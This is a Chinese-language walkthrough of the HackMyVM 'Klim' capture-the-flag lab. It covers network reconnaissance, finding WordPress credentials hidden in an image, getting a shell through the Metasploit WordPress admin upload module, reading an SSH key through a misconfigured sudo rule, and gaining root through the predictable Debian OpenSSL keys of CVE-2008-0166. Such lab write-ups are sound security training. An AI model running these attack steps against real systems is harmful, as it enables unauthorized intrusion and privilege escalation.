目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

CVE-2008-0166

四、结论

---

一、测试环境

1、系统环境

渗透机：kali2021.1(192.168.159.127)

靶  机：debian(192.168.159.27)

注意事项：

①该类型靶场只能在virtualBox上搭建，因此将靶机设置为桥接网络，方便进行渗透。攻击机kali也要桥接出来，不然会出问题。

②靶机启动失败：设置中取消勾选usb即可

​

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、cmseek(获取cms信息)、stegseek(分析图片隐藏信息)、msfconsole(漏洞利用模块)、ssh(远程登录)

测试网址：http://192.168.159.27

靶场介绍：由国外大佬搭建的靶场，类似于vulnhub，经常更新，需要翻墙才能进。

地址：https://hackmyvm.eu/machines/machine.php?vm=Klim

二、测试目的

熟悉wordpress漏洞，熟悉ssh登录流程，以及CVE-2008-0166漏洞利用。获取2个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP：192.168.159.27

物理机IP：192.168.159.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.159.27

靶机开放了22端口(ssh服务)、80端口(web服务)

目录扫描

gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

有wordpress目录

扫描wordpress目录

gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

扫描wordpress/wp-content目录，该目录存在uploads目录

查看wordpress信息

​cmseek -u http://192.168.159.27/wordpress

获取用户名klim

2、Getshell

在wordpress/wp-content/uploads目录中找到一张图片

获取该图片，查看是否有隐藏信息

stegseek image.jpg

可以看到，找到了密码，输出了文件，是有东西的

查看文件，发现是数据包，而且有klim用户的密码

cat image.jpg.out

klim/ss7WhrrnnHOZC%239bQn

数据包是经过url编码的，将密码解码

klim/ss7WhrrnnHOZC#9bQn

现在可以登录wordpress了

在Plugins—Add New Plugin—Upload Plugin处可以上传文件，直接上传木马会被拦

使用msfconsole模块集成利用，上传插件漏洞

use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.168.159.27
set targeturi /wordpress
set username klim
set password ss7WhrrnnHOZC#9bQn
run

成功返回meterpreter会话

3、提权

获取交互式shell并查看sudo权限

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l

看到能以klim用户身份执行/home/klim/tool工具

使用file查看该文件，是一个可执行文件

file /home/klim/tool

使用help参数查看工具解析，可以看出这是cat命令，和cat命令一个作用

sudo -u klim /home/klim/tool --help

可以查看文件，那么首先查看klim用户家目录的文件

存在.ssh目录，查看私钥文件

ls -la /home/klim
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa

将私钥写入id文件并ssh登录klim用户

vim id
chmod 600 id
ssh klim@192.168.159.27 -i id

在当前目录查看user.txt

cat user.txt

user.txt: 2fbef74059deaea1e5e11cff5a65b68e

CVE-2008-0166

基于Debian的操作系统上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用随机数生成器生成可预测的数字，这使得远程攻击者更容易对加密密钥进行暴力猜测攻击。

这个漏洞存在，生成的ssh密钥便可被预测，数量有限。所有ssh密钥对在如下地址下载：

https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2

下载完成后，解压，可以在rsa/2048目录下查看所有公钥私钥

tar -xjf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
ls

利用该漏洞，需要找到公钥，然后根据公钥找到私钥

寻找公钥文件，发现在/opt目录下有个公钥文件，正是root用户的公钥文件

find / -name id_rs* -ls 2>/dev/null

根据公钥的加密信息去匹配已知公钥的编号

使用ssh登录，私钥指定为该编号即可

ssh root@192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
cat root.txt

root.txt: 60667e12c8ea62295de82d053d950e1f

四、结论

Wordpress的文件上传漏洞可以利用，openssl的漏洞导致私钥可被查询出来。